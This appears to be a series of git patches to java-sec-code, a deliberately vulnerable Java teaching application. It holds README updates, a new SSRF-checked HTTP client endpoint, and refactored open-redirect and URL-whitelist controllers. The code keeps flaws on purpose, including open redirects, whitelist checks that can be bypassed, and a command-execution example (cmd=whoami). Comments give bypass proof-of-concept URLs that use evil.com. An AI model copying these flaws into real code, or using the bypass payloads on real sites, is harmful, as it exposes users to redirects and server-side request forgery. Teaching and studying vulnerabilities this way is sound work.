z_r4A&!GB2X9+wd{v&{;O9#%}wXt6Gt*s?sbX7l7JE!jz@N()H!^f-Tur9CM>hO1dO
zzb(n-#Rqy&YuAhstu{H|2lW^}Qb<%szAisIB2Im^ifuZYnL}k*9bT-k{hBl2LbPH}
zE@OBxvlQF>@a=eqvtY|Y1)NQ6L?%okPxcNWn#Z$78(r(b!Kaz%c_8<l+01}M_fNB1
z_A!zrs0dxJGL)ZTN~s_LCL%N7@$vK02`wbUj7*_&<(a{;MElKY=lx44jgMK`N9P9!
zwp8yw(jJa{$=sIbYMC+nn2|Q{iATj0$Ej;L%B+-!cJqS&U?%>K-e21Tu=cMSvN=J=
z`WpKXb93`|4O|Kt-wuj8@Q1|30$$9!-c4xpoSNh5A6f#haifX8;}@?KwI4(EuHODQ
z-CQ0XH}1pOnbi?B_S90RuCA^z_?fVxl9ZXbt9dpC!^6u@%NGaG3*KiapC+owe@l9n
z3VCAYq8jo<NbK|Bh^03&?Q&?hKnm#xhnS&yw{A@EWd-B(b;}+_WlO<OMC}S0J9l70
zR<icco~#Xm@F@Wz#mdC)$f^Bhu9+t%0>beMI=tF<2#~_rL1Q;GfPuA3z%dH!sAgck
z!hZc56Izy@G2w+B>-YQ9KUK@1H!|X6xf``Ga23iWKzw{^dp)Vr>uSMDD63=@QK2=>
z7(+J}nJ)V6&auE?;4q(kuM`1k<Gw2_?{u8o2%^8HkcuB%&h>eIuoyVyQ~ibv8jq{q
zXKJbYKxz@tT-q4S%~ZDUMrSaU0Y_jKDqtyT#|x^ef;f~z1A-6(<po7-+u;W<`5f_h
zJwjh-3!#R6(-7s%=U$fm@~*+f{tTwib&4*ud20FacK`VTk10%#wdDIBKwpLwphg1?
zL*{_L1~2bXYG=8OWy!1U&hS!RxCEz#mN$D=*4vm`vc{1@8iesX>&Ned>mkOkZLg&r
zISD;6+8Zc1v4OqK4wzb&d310-4^9x|s2>mh;U7O!vjTb|=SfcWtKcy$dW)1wG{tqY
znVFS?b8v*g&jDeAR-wSd4O?aWA?fc85qFwmXe8@_x_41%fO)=H#G5v%c+30e&ePc7
zMhD>THEX!SNF=w|Lsta_hCI>edEGX0l+Kh*!19=`ktWhr?X{$7uQ({cx~V+AQdm_U
z1|)86r$~1l72hTLhgpwXaaQoqNH<8~!;s-khYrZZv02{P`b=E9=Tqr3U+UMzz|L{|
zE1_c-533RpjZg49MKk~d!G<aQ63?-8c?0ofl={EbenTU+@$jsp3g4mz2py@>>ogG}
zqDAR{T6HX#oV9B(dABvcsqdXq4#%By(!pNE;7MquT}^Tmd&jPapI^fK&dyOvayvRK
zpzAWe2BuVDTEM#`V#3H>c#06XM%ClulT<MFw;Dv&cIo^>NYFGlJ&MOeS!0SjM6$<K
zS)L^sjDnc^>%8q9XY^2%7p+BrpbL_=@4W*8KrlibHJ9ha(ObwblOYn@$OC=a|5fNx
zli-cAjRo*pVZG8Of!4BoJ6tbJpu9qCa&9XA_2Jg5Pe@tp52)rRp+VDM&1$vMcR=on
zM2xCHf<Mjr+e5@vWI>~#6Te^=v=D*5mi=%(?q6>5!)4%z7~|vt<U`S42SuMim&>#C
z1El+xGJc2_gjC)(FYs&M-$fb!-gACR{}%mif!`MRZGrz|f!=Q{|A8LY@0nU=qN5cf
MeKWm!9p||J0<>Gspa1{>


From a605b1e267f213d7d8a91b7e752923aacf46d430 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 21 Jun 2019 21:07:12 +0800
Subject: [PATCH 029/108] update readme

---
 README.md | 39 +++++++++++++++++++++++++--------------
 1 file changed, 25 insertions(+), 14 deletions(-)

diff --git a/README.md b/README.md
index 12a3453b..9104789a 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,9 @@
 # Java sec code
 
 
-[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md)
+Java sec code is a very powerful and friendly project for learning Java vulnerability code.
+
+[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md)
 
 ## Introduce
 
@@ -101,22 +103,31 @@ return:
 Viarus
 ```
 
-### Jar
+### JAR
 
-- Change `war` to `jar` in `pom.xml`.
+Change `war` to `jar` in `pom.xml`.
 
-    ```xml
-    <groupId>sec</groupId>
-    <artifactId>java-sec-code</artifactId>
-    <version>1.0.0</version>
-    <packaging>war</packaging>
-    ```
+```xml
+<groupId>sec</groupId>
+<artifactId>java-sec-code</artifactId>
+<version>1.0.0</version>
+<packaging>war</packaging>
+```
 
-- Build package and run.
+Build package and run.
 
-    ```
-    mvn clean package -DskipTests 
-    java -jar target/java-sec-code-1.0.0.jar
-    ```
+```
+mvn clean package -DskipTests 
+java -jar target/java-sec-code-1.0.0.jar
+```
+
+
+## Donate
+
+If you like the poject, you can donate to support me. With your support, I will be able to make `Java sec code` better 😎.
+
+### Alipay
 
+Scan the QRcode to support `Java sec code`.
 
+<img title="Alipay QRcode" src="https://aliyun-testaaa.oss-cn-shanghai.aliyuncs.com/alipay_qr.png" width="200">

From edfc1fce32e3e651176bf7982331e85021ee8ca4 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 21 Jun 2019 21:25:50 +0800
Subject: [PATCH 030/108] udpate readme

---
 README.md    |  2 +-
 README_zh.md | 26 ++++++++++++++++++++++----
 2 files changed, 23 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 9104789a..1e987246 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# Java sec code
+# Java Sec Code
 
 
 Java sec code is a very powerful and friendly project for learning Java vulnerability code.
diff --git a/README_zh.md b/README_zh.md
index 06c18121..b42b4c8c 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -1,4 +1,8 @@
-# Java Security Code
+# Java Sec Code
+
+对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目
+
+[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md)
 
 ## 介绍
 
@@ -51,11 +55,13 @@
 3. 重启Tomcat应用
 
 
+例子：
+
 ```
 http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
 ```
  
-返回
+返回：
 
 ``` 
 Viarus
@@ -65,11 +71,13 @@ Viarus
 
 直接点击run按钮即可运行。
 
+例子：
+
 ```
 http://localhost:8080/rce/exec?cmd=whoami
 ```
  
-返回
+返回：
 
 ``` 
 Viarus
@@ -77,7 +85,7 @@ Viarus
 
 
 
-### Jar包
+### JAR包
 
 
 先修改pom.xml里的配置，将war改成jar。
@@ -95,3 +103,13 @@ Viarus
 mvn clean package -DskipTests 
 java -jar 打包后的jar包路径
 ```
+
+## 捐赠
+
+如果你喜欢这个项目，你可以捐款来支持我。 有了你的支持，我将能够更好地制作`Java sec code`项目。
+
+### Alipay
+
+扫描支付宝二维码支持`Java sec code`。
+
+<img title="Alipay QRcode" src="https://aliyun-testaaa.oss-cn-shanghai.aliyuncs.com/alipay_qr.png" width="200">

From 12ab307010aedbeb39b9d14d18c8db039897873d Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 21 Jun 2019 21:27:45 +0800
Subject: [PATCH 031/108] update readme

---
 README_zh.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/README_zh.md b/README_zh.md
index b42b4c8c..66897133 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -1,6 +1,6 @@
 # Java Sec Code
 
-对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目
+对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目。
 
 [英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md)
 
@@ -50,9 +50,9 @@
 
 ### Tomcat
 
-1. 生成war包 `mvn clean package`
-2. 将target目录的war包，cp到Tomcat的webapps目录
-3. 重启Tomcat应用
+1. 生成war包 `mvn clean package`。
+2. 将target目录的war包，cp到Tomcat的webapps目录。
+3. 重启Tomcat应用。
 
 
 例子：

From 0e4f22ec7df2fb420013754a5e0bf0d5628f4fcd Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 25 Jun 2019 13:00:08 +0800
Subject: [PATCH 032/108] Add httpclient SSRF vul code

---
 java-sec-code.iml                             |   1 +
 pom.xml                                       |   8 ++
 src/main/java/org/joychou/Application.java    |   2 +-
 .../org/joychou/CsrfAccessDeniedHandler.java  |   5 +-
 .../java/org/joychou/controller/SSRF.java     |  52 ++++++++
 .../org/joychou/controller/URLRedirect.java   |  34 +++---
 .../org/joychou/controller/URLWhiteList.java  | 115 ++++++++----------
 src/main/java/org/joychou/controller/XXE.java |   1 -
 .../org/joychou/security/SSRFChecker.java     |  17 ++-
 .../org/joychou/security/SecurityUtil.java    |  11 ++
 .../java/org/joychou/security/secFilter.java  |  12 +-
 11 files changed, 156 insertions(+), 102 deletions(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 50a7df08..8a7c0cb7 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -170,5 +170,6 @@
     <orderEntry type="library" name="Maven: org.springframework:spring-aop:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-security:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: commons-net:commons-net:3.6" level="project" />
+    <orderEntry type="library" name="Maven: commons-httpclient:commons-httpclient:3.1" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 6f8e114c..bcfd042c 100644
--- a/pom.xml
+++ b/pom.xml
@@ -84,6 +84,7 @@
             <artifactId>httpclient</artifactId>
             <version>4.3.6</version>
         </dependency>
+
         <dependency>
             <groupId>org.apache.httpcomponents</groupId>
             <artifactId>fluent-hc</artifactId>
@@ -161,6 +162,13 @@
             <version>3.6</version>
         </dependency>
 
+        <!-- HttpClient SSRF -->
+        <dependency>
+            <groupId>commons-httpclient</groupId>
+            <artifactId>commons-httpclient</artifactId>
+            <version>3.1</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 85d0aab8..41169b9a 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -8,7 +8,7 @@
 import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
-@ServletComponentScan
+@ServletComponentScan // do filter
 @SpringBootApplication
 // @EnableEurekaClient  // 测试Eureka请打开注释，防止控制台一直有warning
 public class Application extends SpringBootServletInitializer {
diff --git a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
index 27d72d95..ed043ac2 100644
--- a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
@@ -14,14 +14,15 @@
 public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
     /**
-     * @desc 返回自定义拦截页面
+     * Design csrf access denied page.
+     *
      */
     @Override
     public void handle(HttpServletRequest request, HttpServletResponse response,
                        AccessDeniedException accessDeniedException) throws IOException, ServletException {
         response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
         response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
-        response.getWriter().write("CSRF check failed by JoyChou.");  // response
+        response.getWriter().write("CSRF check failed by JoyChou.");  // response contents
     }
 
 }
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 550b13a3..3f731506 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -2,7 +2,10 @@
 
 import com.google.common.io.Files;
 import com.squareup.okhttp.OkHttpClient;
+import org.apache.commons.httpclient.HttpClient;
+import org.apache.commons.httpclient.methods.GetMethod;
 import org.apache.http.HttpResponse;
+import org.apache.http.HttpStatus;
 import org.apache.http.client.fluent.Request;
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
@@ -176,6 +179,55 @@ public static String ssrf_HttpClient(HttpServletRequest request) {
     }
 
 
+    /**
+     * Safe code: http://localhost:8080/ssrf/commonsHttpClient?url=http://www.baidu.com
+     *
+     * @param request
+     * @return
+     */
+    @RequestMapping("/commonsHttpClient")
+    @ResponseBody
+    public static String commonsHttpClient(HttpServletRequest request) {
+
+        String url = request.getParameter("url");
+
+        // Security check
+        if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
+            return "Bad man. I got u.";
+        }
+        // Create an instance of HttpClient.
+        HttpClient client = new HttpClient();
+
+        // Create a method instance.
+        GetMethod method = new GetMethod(url);
+
+        // forbid 302 redirection
+        method.setFollowRedirects(false);
+
+        try {
+            // Send http request.
+            int status_code = client.executeMethod(method);
+
+            // Only allow the url that status_code is 200.
+            if (status_code != HttpStatus.SC_OK) {
+                return "Method failed: " + method.getStatusLine();
+            }
+
+            // Read the response body.
+            byte[] resBody = method.getResponseBody();
+            return new String(resBody);
+
+        } catch (IOException e) {
+            return "Error: " + e.getMessage();
+        } finally {
+            // Release the connection.
+            method.releaseConnection();
+        }
+
+
+    }
+
+
     /**
      * http://localhost:8080/ssrf/ImageIO_safe?url=
      *
diff --git a/src/main/java/org/joychou/controller/URLRedirect.java b/src/main/java/org/joychou/controller/URLRedirect.java
index 753530d1..26fc1652 100644
--- a/src/main/java/org/joychou/controller/URLRedirect.java
+++ b/src/main/java/org/joychou/controller/URLRedirect.java
@@ -13,29 +13,28 @@
 import org.joychou.security.SecurityUtil;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2017.12.28
- * @desc    Java url redirect.
- * @fix     Check redirect url whitelist.
+ * The vulnerability code and security code of Java url redirect.
+ * The security code is checking whitelist of url redirect.
+ *
+ * @author   JoyChou (joychou@joychou.org)
+ * @version  2017.12.28
  */
 
-
 @Controller
 @RequestMapping("/urlRedirect")
 public class URLRedirect {
 
     /**
-     * usage: http://localhost:8080/urlRedirect/redirect?url=http://www.baidu.com
-     *
+     * http://localhost:8080/urlRedirect/redirect?url=http://www.baidu.com
      */
     @GetMapping("/redirect")
     public String redirect(@RequestParam("url") String url) {
         return "redirect:" + url;
     }
 
+
     /**
-     * usage: http://localhost:8080/urlRedirect/setHeader?url=http://www.baidu.com
-     *
+     * http://localhost:8080/urlRedirect/setHeader?url=http://www.baidu.com
      */
     @RequestMapping("/setHeader")
     @ResponseBody
@@ -45,9 +44,9 @@ public static void setHeader(HttpServletRequest request, HttpServletResponse res
         response.setHeader("Location", url);
     }
 
+
     /**
-     * usage: http://localhost:8080/urlRedirect/sendRedirect?url=http://www.baidu.com
-     *
+     * http://localhost:8080/urlRedirect/sendRedirect?url=http://www.baidu.com
      */
     @RequestMapping("/sendRedirect")
     @ResponseBody
@@ -58,13 +57,12 @@ public static void sendRedirect(HttpServletRequest request, HttpServletResponse
 
 
     /**
-     * desc: security code.Because it can only jump according to the path, it cannot jump according to other urls.
-     * usage: http://localhost:8080/urlRedirect/forward?url=/urlRedirect/test
-     *
+     * Safe code. Because it can only jump according to the path, it cannot jump according to other urls.
+     * http://localhost:8080/urlRedirect/forward?url=/urlRedirect/test
      */
     @RequestMapping("/forward")
     @ResponseBody
-    public static void forward(HttpServletRequest request, HttpServletResponse response) throws IOException{
+    public static void forward(HttpServletRequest request, HttpServletResponse response) {
         String url = request.getParameter("url");
         RequestDispatcher rd =request.getRequestDispatcher(url);
         try{
@@ -74,10 +72,10 @@ public static void forward(HttpServletRequest request, HttpServletResponse respo
         }
     }
 
+
     /**
-     * desc: sendRedirect security code
-     * usage: http://localhost:8080/urlRedirect/sendRedirect_seccode?url=http://www.baidu.com
-     *
+     * Safe code of sendRedirect.
+     * http://localhost:8080/urlRedirect/sendRedirect_seccode?url=http://www.baidu.com
      */
     @RequestMapping("/sendRedirect_seccode")
     @ResponseBody
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index fb5ce94b..94df0400 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -1,7 +1,6 @@
 package org.joychou.controller;
 
 
-import com.google.common.net.InternetDomainName;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -14,9 +13,11 @@
 import java.util.regex.Pattern;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.08.23
- * @desc    URL whitelist bypass.
+ * The vulnerability code and security code of Java url whitelist.
+ * The security code is checking url whitelist.
+ *
+ * @author    JoyChou (joychou@joychou.org)
+ * @version   2018.08.23
  */
 
 @Controller
@@ -24,11 +25,12 @@
 public class URLWhiteList {
 
 
-    private String urlwhitelist[] = {"joychou.org", "joychou.com"};
+    private String domainwhitelist[] = {"joychou.org", "joychou.com"};
 
     /**
-     * @desc 绕过方法bypassjoychou.org
-     * @usage http://localhost:8080/url/endswith?url=http://aaajoychou.org
+     * bypass poc: bypassjoychou.org
+     * http://localhost:8080/url/endswith?url=http://aaajoychou.org
+     *
      */
     @RequestMapping("/endswith")
     @ResponseBody
@@ -37,7 +39,7 @@ public String endsWith(HttpServletRequest request) throws Exception{
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
-        for (String domain: urlwhitelist){
+        for (String domain: domainwhitelist){
             if (host.endsWith(domain)) {
                 return "Good url.";
             }
@@ -46,8 +48,9 @@ public String endsWith(HttpServletRequest request) throws Exception{
     }
 
     /**
-     * @desc 绕过方法joychou.org.bypass.com  bypassjoychou.org
-     * @usage http://localhost:8080/url/contains?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     * bypass poc: joychou.org.bypass.com or bypassjoychou.org.
+     * http://localhost:8080/url/contains?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     *
      */
     @RequestMapping("/contains")
     @ResponseBody
@@ -56,7 +59,7 @@ public String contains(HttpServletRequest request) throws Exception{
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
-        for (String domain: urlwhitelist){
+        for (String domain: domainwhitelist){
             if (host.contains(domain)) {
                 return "Good url.";
             }
@@ -66,8 +69,9 @@ public String contains(HttpServletRequest request) throws Exception{
 
 
     /**
-     * @desc 绕过方法bypassjoychou.org，代码功能和endsWith一样
-     * @usage http://localhost:8080/url/regex?url=http://aaajoychou.org
+     * bypass poc: bypassjoychou.org. It's the same with endsWith.
+     * http://localhost:8080/url/regex?url=http://aaajoychou.org
+     *
      */
     @RequestMapping("/regex")
     @ResponseBody
@@ -87,8 +91,9 @@ public String regex(HttpServletRequest request) throws Exception{
 
 
     /**
-     * @desc 绕过方法joychou.org.bypass.com  bypassjoychou.org，代码功能和 contains 一样
-     * @usage http://localhost:8080/url/indexof?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     * bypass poc: joychou.org.bypass.com or bypassjoychou.org. It's the same with contains.
+     * http://localhost:8080/url/indexof?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     *
      */
     @RequestMapping("/indexof")
     @ResponseBody
@@ -96,8 +101,8 @@ public String indexOf(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
         URL u = new URL(url);
         String host = u.getHost();
-        // indexOf为-1，表示没有匹配到字符串
-        for (String domain: urlwhitelist){
+        // If indexOf returns -1, it means that no string was found.
+        for (String domain: domainwhitelist){
             if (host.indexOf(domain) != -1) {
                 return "Good url.";
             }
@@ -106,8 +111,12 @@ public String indexOf(HttpServletRequest request) throws Exception{
     }
 
     /**
-     * @desc 用java.net.URL类的getHost被绕过情况
-     * @usage https://github.com/JoyChou93/java-sec-code/wiki/SecurityUtil-whtielist-Bypass
+     * The bypass of using java.net.URL to getHost.
+     *
+     * Bypass poc1: curl -v 'http://localhost:8080/url/url_bypass?url=http://evel.com%5c@www.joychou.org/a.html'
+     * Bypass poc2: curl -v 'http://localhost:8080/url/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html'
+     *
+     * Detail: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
      */
     @RequestMapping("/url_bypass")
     @ResponseBody
@@ -115,69 +124,46 @@ public String url_bypass(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
         System.out.println("url:  " + url);
         URL u = new URL(url);
-        // 判断是否是http(s)协议
+
         if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
             return "Url is not http or https";
         }
+
         String host = u.getHost().toLowerCase();
         System.out.println("host:  " + host);
 
-        if (host.endsWith("." + urlwhitelist)) {
-            return "Good url.";
-        } else {
-            return "Bad url.";
-        }
-    }
-
-
-    /**
-     * @desc 利用InternetDomainName库获取一级域名的安全代码 (一级域名白名单)
-     */
-    @RequestMapping("/seccode")
-    @ResponseBody
-    public String seccode(HttpServletRequest request) throws Exception{
-        String url = request.getParameter("url");
-
-        URI uri = new URI(url);
-        // 判断是否是http(s)协议
-        if (!url.startsWith("http://") && !url.startsWith("https://")) {
-            return "SecurityUtil is not http or https";
+        // endsWith .
+        for (String domain: domainwhitelist){
+            if (host.endsWith("." + domain)) {
+                return "Good url.";
+            }
         }
 
-        // 使用uri获取host
-        String host = uri.getHost().toLowerCase();
+        return "Bad url.";
+    }
 
-        // 如果非顶级域名后缀会报错
-        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
-        if (rootDomain.equals(urlwhitelist)) {
-            return "Good url.";
-        } else {
-            return "Bad url.";
-        }
-    }
 
     /**
-     * @desc 自定义一级域名白名单
-     * @usage http://localhost:8080/url/seccode1?url=http://aa.taobao.com
+     * First-level host whitelist.
+     * http://localhost:8080/url/seccode1?url=http://aa.taobao.com
+     *
      */
     @RequestMapping("/seccode1")
     @ResponseBody
     public String seccode1(HttpServletRequest request) throws Exception{
 
-        // 定义一级域名白名单list，用endsWith加上.判断
         String whiteDomainlists[] = {"taobao.com", "tmall.com"};
         String url = request.getParameter("url");
 
         URI uri = new URI(url);
-        // 判断是否是http(s)协议
         if (!url.startsWith("http://") && !url.startsWith("https://")) {
             return "SecurityUtil is not http or https";
         }
 
-        // 使用uri获取host
         String host = uri.getHost().toLowerCase();
 
+        // endsWith .
         for (String domain: whiteDomainlists){
             if (host.endsWith("." + domain)) {
                 return "Good url.";
@@ -188,24 +174,23 @@ public String seccode1(HttpServletRequest request) throws Exception{
     }
 
     /**
-     * @desc 自定义多级域名白名单
-     * @usage http://localhost:8080/url/seccode2?url=http://ccc.bbb.taobao.com
+     * Muti-level host whitelist.
+     * http://localhost:8080/url/seccode2?url=http://ccc.bbb.taobao.com
+     *
      */
     @RequestMapping("/seccode2")
     @ResponseBody
     public String seccode2(HttpServletRequest request) throws Exception{
-        // 定义多级域名白名单，判断使用equals
         String whiteDomainlists[] = {"aaa.taobao.com", "ccc.bbb.taobao.com"};
         String url = request.getParameter("url");
 
         URI uri = new URI(url);
-        // 判断是否是http(s)协议
         if (!url.startsWith("http://") && !url.startsWith("https://")) {
             return "SecurityUtil is not http or https";
         }
-        // 使用uri获取host
         String host = uri.getHost().toLowerCase();
 
+        // equals
         for (String domain: whiteDomainlists){
             if (host.equals(domain)) {
                 return "Good url.";
@@ -215,14 +200,15 @@ public String seccode2(HttpServletRequest request) throws Exception{
     }
 
     /**
-     * @desc 自定义多级域名白名单
-     * @usage http://localhost:8080/url/seccode3?url=http://ccc.bbb.taobao.com
+     * Muti-level host whitelist.
+     * http://localhost:8080/url/seccode3?url=http://ccc.bbb.taobao.com
+     *
      */
     @RequestMapping("/seccode3")
     @ResponseBody
     public String seccode3(HttpServletRequest request) throws Exception{
 
-        // 定义多级域名白名单
+        // Define muti-level host whitelist.
         ArrayList<String> whiteDomainlists = new ArrayList<String>();
         whiteDomainlists.add("bbb.taobao.com");
         whiteDomainlists.add("ccc.bbb.taobao.com");
@@ -230,13 +216,10 @@ public String seccode3(HttpServletRequest request) throws Exception{
         String url = request.getParameter("url");
         URI uri = new URI(url);
 
-        // 判断是否是http(s)协议
         if (!url.startsWith("http://") && !url.startsWith("https://")) {
             return "SecurityUtil is not http or https";
         }
-        // 使用uri获取host
         String host = uri.getHost().toLowerCase();
-
         if (whiteDomainlists.indexOf(host) != -1) {
             return "Good url.";
         }
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 11280a51..5bc9d683 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -101,7 +101,6 @@ public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
 
             return "ok";
         } catch (Exception e) {
-            System.out.println(e);
             return "except";
         }
     }
diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
index 1a4a5d91..1dcbf591 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -8,7 +8,7 @@
 
 public class SSRFChecker {
 
-    public static int connectTime = 5*1000;  // 设置连接超时时间5s
+    private static int connectTime = 5*1000;  // 设置连接超时时间5s
 
     /**
      * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
@@ -54,13 +54,12 @@ public static Boolean checkSSRF(String url) {
     }
 
 
-
     /**
      * 判断一个URL的IP是否是内网IP
      *
      * @return 如果是内网IP，返回true；非内网IP，返回false。
      */
-    public static boolean isInnerIPByUrl(String url) throws Exception {
+    public static Boolean isInnerIPByUrl(String url) {
         String host = url2host(url);
         if (host.equals("")) {
             return true; // 异常URL当成内网IP等非法URL处理
@@ -78,10 +77,10 @@ public static boolean isInnerIPByUrl(String url) throws Exception {
     /**
      * 使用SubnetUtils库判断ip是否在内网网段
      *
-     * @param strIP
+     * @param strIP ip字符串
      * @return 如果是内网ip，返回true，否则返回false。
      */
-    public static boolean isInnerIp(String strIP){
+    private static boolean isInnerIp(String strIP){
 
         String blackSubnetlist[] = {"10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8"};
 
@@ -102,9 +101,9 @@ public static boolean isInnerIp(String strIP){
      * 167772161转换为10.0.0.1
      * 127.0.0.1.xip.io转换为127.0.0.1
      *
-     * @param host
+     * @param host 域名host
      */
-    public static String host2ip(String host) {
+    private static String host2ip(String host) {
         try {
             InetAddress IpAddress = InetAddress.getByName(host); //  send dns request
             return IpAddress.getHostAddress();
@@ -117,9 +116,9 @@ public static String host2ip(String host) {
     /**
      * 从URL中获取host，限制为http/https协议。只支持http:// 和 https://，不支持//的http协议。
      *
-     * @param url
+     * @param url http的url
      */
-    public static String url2host(String url) {
+    private static String url2host(String url) {
         try {
             // 使用URI，而非URL，防止被绕过。
             URI u = new URI(url);
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index e3fdc4eb..6eab2cac 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -51,4 +51,15 @@ public static Boolean checkSSRF(String url) {
         }
     }
 
+
+    /**
+     * Suitable for: TTL isn't set to 0 & Redirect is forbidden.
+     *
+     * @param url the url needs to check
+     * @return Safe url returns true. Dangerous url returns false.
+     */
+    public static boolean checkSSRFWithoutRedirect(String url) {
+        return !SSRFChecker.isInnerIPByUrl(url);
+    }
+
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/secFilter.java
index e9bdf653..072f7fca 100644
--- a/src/main/java/org/joychou/security/secFilter.java
+++ b/src/main/java/org/joychou/security/secFilter.java
@@ -1,6 +1,5 @@
 package org.joychou.security;
 
-import org.springframework.http.MediaType;
 
 import javax.servlet.*;
 import javax.servlet.annotation.WebFilter;
@@ -11,8 +10,11 @@
 
 
 /**
- * usage: 对所有带有callback参数的get请求做referer校验，如果校验失败返回403页面
- * desc:  除了以下代码，还需要在Application.java中添加@ServletComponentScan注解
+ * Check referer for all GET requests with callback parameters.
+ * If the check of referer fails, a 403 forbidden error page will be returned.
+ *
+ * Still need to add @ServletComponentScan annotation in Application.java.
+ *
  */
 @WebFilter(filterName = "referSecCheck", urlPatterns = "/*")
 public class secFilter implements Filter {
@@ -32,9 +34,9 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         String refer = request.getHeader("referer");
         String referWhitelist[] = {"joychou.org", "joychou.com"};
 
-        // get method and includes callback parameter
+        // Check referer for all GET requests with callback parameters.
         if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){
-            // if check referer failed, redirect 403 forbidden page.
+             // If the check of referer fails, a 403 forbidden error page will be returned.
             if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
                 response.sendRedirect("https://test.joychou.org/error3.html");
                 return;

From 85ca363abd42159c29cced7a8a3ad1901ce73faa Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 28 Jun 2019 16:38:31 +0800
Subject: [PATCH 033/108] update readme

---
 README.md                                     |  1 +
 README_zh.md                                  | 42 ++++++++++---------
 .../java/org/joychou/controller/SSRF.java     | 20 ++++++---
 src/main/java/org/joychou/controller/XXE.java |  6 +--
 4 files changed, 40 insertions(+), 29 deletions(-)

diff --git a/README.md b/README.md
index 1e987246..c7f42841 100644
--- a/README.md
+++ b/README.md
@@ -44,6 +44,7 @@ Sort by letter.
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
 - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
